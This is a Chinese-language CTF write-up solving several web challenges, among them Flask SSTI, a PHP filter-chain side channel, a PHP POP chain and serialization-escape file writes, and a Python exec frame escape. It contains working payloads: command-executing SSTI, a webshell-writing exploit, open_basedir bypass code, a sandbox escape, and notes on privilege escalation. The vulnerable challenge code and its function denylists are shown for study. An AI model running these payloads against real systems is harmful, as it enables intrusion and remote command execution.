easy_flask
有ssti注入,直接打
{{config.__class__.__init__.__globals__['os'].popen('tac f???').read()}}
file_copy
上来给了个提示说是copy文件.然而不知道copy哪去了,只能看到文件多大.
触发报错的时候看到了这样的提示
这个copy估计不是php里原生的函数,而是自己定义的(参数个数不对).联想到了php filter chain侧信道攻击.
python3 filters_chain_oracle_exploit.py --target http://eci-2zeaxdw9t0n5rr6drkk1.cloudeci1.ichunqiu.com/ --file /flag --parameter path
打不通的话多打几遍即可.
easy_ser
<?php
//error_reporting(0);
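/**
 * Denylist check for dangerous function names in the decoded upload content.
 *
 * @param string $data Decoded payload to inspect.
 * @return bool true when any listed name occurs anywhere in $data
 *              (case-insensitive, multi-line), false otherwise.
 */
function PassWAF1($data){
    // One entry per name; the original list carried "popen" twice.
    $blackList = [
        'eval', 'system', 'popen', 'exec', 'assert', 'phpinfo',
        'shell_exec', 'pcntl_exec', 'passthru', 'putenv',
    ];
    foreach ($blackList as $needle) {
        // preg_quote keeps the match literal even if an entry ever contains a
        // regex metacharacter; today every entry is a plain word, so the
        // compiled patterns are identical to the original ones.
        if (preg_match('/' . preg_quote($needle, '/') . '/im', $data)) {
            return true;
        }
    }
    // NOTE: a substring denylist is a speed bump, not a security boundary;
    // anything not named above passes through unchanged.
    return false;
}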
/**
 * Render $str as a classic hex dump: 16 bytes per row, with the row offset,
 * the hex digits grouped four at a time, and a printable-ASCII column in
 * which bytes outside 0x20..0x7e are shown as '.'.
 *
 * @param string $str Raw bytes to dump.
 * @return string One "%08x: %-40s %-16s\n" row per 16-byte chunk.
 */
function PassWAF2($str){
    $rows = [];
    $offset = 0;
    foreach (str_split($str, 16) as $chunk) {
        $hexWords = implode(' ', str_split(bin2hex($chunk), 4));
        $printable = '';
        foreach (str_split($chunk) as $byte) {
            $code = ord($byte);
            // Printable bytes are copied verbatim into the right-hand column.
            $printable .= ($code < 0x20 || $code > 0x7e) ? '.' : $byte;
        }
        $rows[] = sprintf("%08x: %-40s %-16s\n", $offset, $hexWords, $printable);
        $offset += 16;
    }
    return implode('', $rows);
}
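/**
 * Reject file names containing a parent-directory reference or a path separator.
 *
 * @param string $data Candidate file name.
 * @return bool true when ".." or "/" occurs anywhere in $data, false otherwise.
 */
function PassWAF3($data){
    // Build the patterns with preg_quote instead of relying on "\." and "\/"
    // surviving a double-quoted literal (they only do because PHP defines no
    // such escapes). The resulting regexes are the same as before.
    $blackList = ['..', '/'];
    foreach ($blackList as $needle) {
        if (preg_match('/' . preg_quote($needle, '/') . '/im', $data)) {
            return true;
        }
    }
    // NOTE: this is a denylist on the raw name, not a canonical-path check;
    // callers must still confine the write to a fixed directory.
    return false;
}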
/**
 * Decode a base64 string, or print "gg" and terminate the script on failure.
 *
 * @param string $s Base64 text. Decoding is non-strict: characters outside
 *                  the base64 alphabet are skipped rather than rejected.
 * @return string Decoded bytes.
 */
function Base64Decode($s){
    $decoded = base64_decode($s);
    // base64_decode() reports failure as false; never hand that to callers.
    if (!is_bool($decoded)) {
        return $decoded;
    }
    echo "gg";
    exit(-1);
}
/**
 * Holds one value and prints it when the object is called like a function.
 */
class STU{
    public $stu;

    /**
     * @param mixed $stu Value to print later; an object is converted through
     *                   its __toString when printed.
     */
    public function __construct($stu){
        $this->stu = $stu;
    }

    /** Print the stored value; this is what `$obj()` triggers. */
    public function __invoke(){
        print $this->stu;
    }
}
/**
 * Calls whatever is stored in $Dazhuan as soon as the object is unserialized.
 *
 * __wakeup runs automatically and $Dazhuan comes straight from the serialized
 * bytes, so feeding untrusted input to unserialize() turns this class into a
 * call of a caller-chosen callable (closure, function name, or an object with
 * __invoke). This is the reason unserialize() on request data is unsafe.
 */
class SDU{
    public $Dazhuan;

    public function __wakeup(){
        ($this->Dazhuan)();
    }
}
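/**
 * When cast to string, writes a hex dump of a base64-encoded payload to
 * $filename.
 *
 * Both properties are attacker-controlled once the object arrives through
 * unserialize(); the two denylists are the only checks before the write.
 */
class CTF{
    public $hackman;
    public $filename;

    /**
     * @return string "really!" after a write; '' when the payload or the
     *                file name was rejected (a message is echoed either way).
     */
    public function __toString(){
        $data = Base64Decode($this->hackman);
        $filename = $this->filename;
        if (PassWAF1($data)) {
            echo "so dirty";
            // __toString must return a string; a bare `return;` makes PHP
            // raise an error right after the message has been printed.
            return '';
        }
        if (PassWAF3($filename)) {
            echo "just so so?";
            return '';
        }
        // PassWAF2 reformats the content as a hex dump, but every printable
        // byte is still copied verbatim into its ASCII column, so the rewrite
        // is not a sanitiser.
        file_put_contents($filename, PassWAF2($data));
        echo "hack?";
        return "really!";
    }

    public function __destruct(){
        echo "bye";
    }
}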
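// Entry point: the POST field "data" is handed to unserialize() unchanged.
// NOTE(review): unserialize() of request data instantiates any class in scope
// and runs its __wakeup/__destruct/__toString hooks; prefer JSON for request
// payloads, or at minimum pass ['allowed_classes' => false].
if (isset($_POST['data'])) {
    // Read the key only after the isset() check; the original read it first
    // and emitted an undefined-index notice/warning on every non-POST request.
    $give = $_POST['data'];
    unserialize($give);
} else {
    echo "<center>听说pop挺好玩的</center>";
    highlight_file(__FILE__);
}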
比较恶心人的就是这个waf2,它会对我们传上去的文件内容进行修改.最开始试图构建超短一句话木马去弹shell
<?=`$_GET[1]`?>
这个长度是刚好的,然而传上去也不知道是不解析短标签还是不出网,反正没反应.最后写出了个exp
<?php
//error_reporting(0);
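/**
 * Denylist check for dangerous function names in the decoded upload content.
 *
 * @param string $data Decoded payload to inspect.
 * @return bool true when any listed name occurs anywhere in $data
 *              (case-insensitive, multi-line), false otherwise.
 */
function PassWAF1($data){
    // One entry per name; the original list carried "popen" twice.
    $blackList = [
        'eval', 'system', 'popen', 'exec', 'assert', 'phpinfo',
        'shell_exec', 'pcntl_exec', 'passthru', 'putenv',
    ];
    foreach ($blackList as $needle) {
        // preg_quote keeps the match literal even if an entry ever contains a
        // regex metacharacter; today every entry is a plain word, so the
        // compiled patterns are identical to the original ones.
        if (preg_match('/' . preg_quote($needle, '/') . '/im', $data)) {
            return true;
        }
    }
    // NOTE: a substring denylist is a speed bump, not a security boundary;
    // anything not named above passes through unchanged.
    return false;
}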
/**
 * Render $str as a classic hex dump: 16 bytes per row, with the row offset,
 * the hex digits grouped four at a time, and a printable-ASCII column in
 * which bytes outside 0x20..0x7e are shown as '.'.
 *
 * @param string $str Raw bytes to dump.
 * @return string One "%08x: %-40s %-16s\n" row per 16-byte chunk.
 */
function PassWAF2($str){
    $rows = [];
    $offset = 0;
    foreach (str_split($str, 16) as $chunk) {
        $hexWords = implode(' ', str_split(bin2hex($chunk), 4));
        $printable = '';
        foreach (str_split($chunk) as $byte) {
            $code = ord($byte);
            // Printable bytes are copied verbatim into the right-hand column.
            $printable .= ($code < 0x20 || $code > 0x7e) ? '.' : $byte;
        }
        $rows[] = sprintf("%08x: %-40s %-16s\n", $offset, $hexWords, $printable);
        $offset += 16;
    }
    return implode('', $rows);
}
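/**
 * Reject file names containing a parent-directory reference or a path separator.
 *
 * @param string $data Candidate file name.
 * @return bool true when ".." or "/" occurs anywhere in $data, false otherwise.
 */
function PassWAF3($data){
    // Build the patterns with preg_quote instead of relying on "\." and "\/"
    // surviving a double-quoted literal (they only do because PHP defines no
    // such escapes). The resulting regexes are the same as before.
    $blackList = ['..', '/'];
    foreach ($blackList as $needle) {
        if (preg_match('/' . preg_quote($needle, '/') . '/im', $data)) {
            return true;
        }
    }
    // NOTE: this is a denylist on the raw name, not a canonical-path check;
    // callers must still confine the write to a fixed directory.
    return false;
}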
/**
 * Decode a base64 string, or print "gg" and terminate the script on failure.
 *
 * @param string $s Base64 text. Decoding is non-strict: characters outside
 *                  the base64 alphabet are skipped rather than rejected.
 * @return string Decoded bytes.
 */
function Base64Decode($s){
    $decoded = base64_decode($s);
    // base64_decode() reports failure as false; never hand that to callers.
    if (!is_bool($decoded)) {
        return $decoded;
    }
    echo "gg";
    exit(-1);
}
// Property-only stand-in for the target's STU: serialize() records only the
// public properties, so the constructor and __invoke are not needed here.
class STU{
public $stu;
}
// Property-only stand-in for the target's SDU (whose __wakeup calls $Dazhuan).
class SDU{
public $Dazhuan;
}
// Property-only stand-in for the target's CTF (whose __toString writes a file).
class CTF{
public $hackman;
public $filename;
}
// Assemble the object graph the target's unserialize() will walk:
// SDU::__wakeup -> STU::__invoke (echo) -> CTF::__toString -> file_put_contents.
// Defender's takeaway: every hop is a built-in magic method on a class that
// happens to be loaded, which is why unserialize() of request data is unsafe
// regardless of the content denylists.
$a = new SDU();
$a->Dazhuan = new STU();
$a->Dazhuan->stu = new CTF();
// hackman is base64 because the target's Base64Decode() runs first; filename
// has no "/" or ".." so PassWAF3() accepts it.
$a->Dazhuan->stu->hackman = base64_encode('<?php echo ` |$_GET[1]`;?>');
$a->Dazhuan->stu->filename = "shell.php";
echo serialize($a);
这个shell传上去的效果是这样的
在执行命令中使用|
直接压制住了前面那堆屎.
Pyjail
赛后闲的没事看了眼pyjail这题,属于是考的2024国赛相同知识点.
import base64
from random import randint
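# Challenge service: load the flag, draw a secret list from the global PRNG,
# then run user-supplied code with no builtins and check whether it produced
# that list in a local named "s".
with open("flag", "r") as f:
    flag = f.read()

# 624 draws from random's global generator; reproducing them is the intended solve.
BOX = [randint(1, 9999) for _ in range(624)]

print("Give me your solve:")
user_input = input().strip()
try:
    user_code = base64.b64decode(user_input).decode()
except Exception:
    print("Invalid base64 input")
    exit(1)

# Explicit check instead of `assert`: assertions are stripped when the
# interpreter runs with -O, which would silently remove the length limit.
if len(user_code) > 121:
    print("Input exceeds maximum allowed length")
    exit(1)

# NOTE(review): removing __builtins__ is not a sandbox. Code under exec()
# shares the interpreter, so it can still reach the calling frames and their
# globals (the official solve does exactly that). Untrusted code needs
# process-level isolation, not a restricted globals dict.
exec_globals = {"__builtins__": None}
exec_locals = {}
try:
    exec(user_code, exec_globals, exec_locals)
except Exception:
    print("Error")
    exit(1)

s = exec_locals.get("s", None)
if s == BOX:
    print(flag)
else:
    print("Incorrect")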
一眼栈帧逃逸,贴一下官方的exp吧
import base64
# Official solve, kept as a reference for why the exec() "sandbox" above does
# not hold: a generator's gi_frame exposes f_back, so code running inside
# exec() can walk back to the frame that owns BOX and read it from f_globals.
# The mitigation is not to run untrusted code in-process at all.
"""
def b():
def a():yield g.gi_frame.f_back.f_back.f_back.f_back
g=a();g=[x for x in g][0];return g.f_globals['BOX']
s=b()
"""
# Same code as one "\n"-joined string so it can be length-checked and encoded.
m = "def b():\n def a():yield g.gi_frame.f_back.f_back.f_back.f_back\n g=a();g=[x for x in g][0];return g.f_globals['BOX']\ns=b()"
p = base64.b64encode(m.encode())
print(p)
# Must stay <= 121 to pass the challenge's length check.
print(len(m))
b0okshelf
没做出来,照着官方的wp复现的.环境存下来了.
直接看漏洞的位置
<?php
// Handle the "add book" form: store the book text and a serialized record,
// then redirect back to the index.
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    require_once 'data.php';
    $book = new Book();
    $book->id = uniqid();
    $book->title = $_POST['title'];
    $book->author = $_POST['author'];
    $book->summary = $_POST['summary'];
    $basePath = 'books/' . $book->id;
    $book->reader = new Reader($basePath . '.txt');
    file_put_contents($basePath . '.txt', '读书使人进步!');
    // NOTE(review): waf() rewrites quotes *after* serialize(), so every
    // replaced byte lengthens a field without updating its s:N: length
    // prefix; the stored record no longer round-trips, and user-supplied text
    // can steer what unserialize() parses later. Escape the fields before
    // serialize(), or store the record as JSON instead.
    file_put_contents($basePath . '.info', waf(serialize($book)));
    header('Location: index.php');
    exit();
}
/**
 * Escape single quotes with a backslash.
 *
 * Note that this is applied to an already-serialized string by its caller,
 * which changes byte lengths that the serialized format encodes explicitly.
 *
 * @param string $data Text to escape.
 * @return string $data with every ' turned into \'.
 */
function waf($data)
{
    $quote = "'";
    $escaped = "\\'";
    return str_replace($quote, $escaped, $data);
}
// Non-POST requests fall through to the shared page header.
include_once 'common/header.php';
?>
在waf的时候发生了反序列化增多逃逸,因此可以通过构造出现任意写文件.
O:4:"Book":5:{s:2:"id";s:13:"678bbfb094793";s:5:"title";s:6:"common";s:6:"author";s:3:"lbz";s:7:"summary";s:10:"helloworld";s:6:"reader";O:6:"Reader":1:{s:16:"%00Reader%00location";s:23:"books/678bbfb094793.txt";}}
例如上面这个反序列化,我们可以通过控制helloworld
的值来覆盖后面的部分.
成功写入shell,发现存在open_basedir限制以及disable_functions.使用下面的payload绕过目录限制.
mkdir('sub');chdir('sub');ini_set('open_basedir','..');chdir('..');chdir('..');chdir('..');chdir('..');ini_set('open_basedir','/');var_dump(scandir('/'));
然后用cnext打一手iconv去绕过disable_functions,蚁剑插件不好使.成功拿shell.
最后使用sudo date去提权,成功拿到flag.
easy_php
有原题 [SWPUCTF 2018]SimplePHP,而且出题的眼神比较差,黑名单防错人了,直接在file.php处去读flag就行.
easy_code
上来robots.txt泄露出路由gogogo.php
<?php
// Show this file's own source, then gate an include() behind a numeric
// "ctfer" parameter and a "pass" cookie.
header('Content-Type: text/html; charset=utf-8');
highlight_file(__FILE__);

// Declared but never consulted below; include() is not restricted to it.
$allowedFiles = ['read.php', 'index.php'];

$ctfer = $_GET['ctfer'] ?? null;
if ($ctfer === null) {
    die("error 0!");
}
if (!is_numeric($ctfer)) {
    die("error 1!");
}
// Loose `!=` against an int compares a numeric string by value, so passing
// is_numeric() plus this check does not pin the exact text of $ctfer.
if ($ctfer != 667) {
    die("error 2!");
}
// "溢出" (overflow) in the original: the string form of $ctfer must not
// contain a literal '7'.
$hasSeven = strpos(strval($ctfer), '7') !== false;
if ($hasSeven) {
    die("error 3!");
}

$file = $_GET["file"];
if ($_COOKIE['pass'] == "admin") {
    if (isset($file)) {
        // Denylist of wrapper and file-name fragments; anything not matched
        // reaches include() unchanged.
        $blocked = preg_match("/^(?:.*(?:base|rot13|input|data|flag|file|2|5|base64|log|proc|self|env).*)$/i", $file);
        if ($blocked) {
            echo "prohibited prohibited!!!!";
        } else {
            echo "试试read.php";
            // NOTE(review): include() of a request value accepts stream
            // wrappers as well as paths, so a name denylist is not a
            // boundary; resolve $file against $allowedFiles instead.
            include($file);
        }
    }
}
?>
第一处使用弱比较去绕过,666.9999999999999999999999;第二处使用filter过滤器去读文件file=php://filter/convert.iconv.SJIS*.UCS-4*/resource=read.php
直接读read.php就是flag.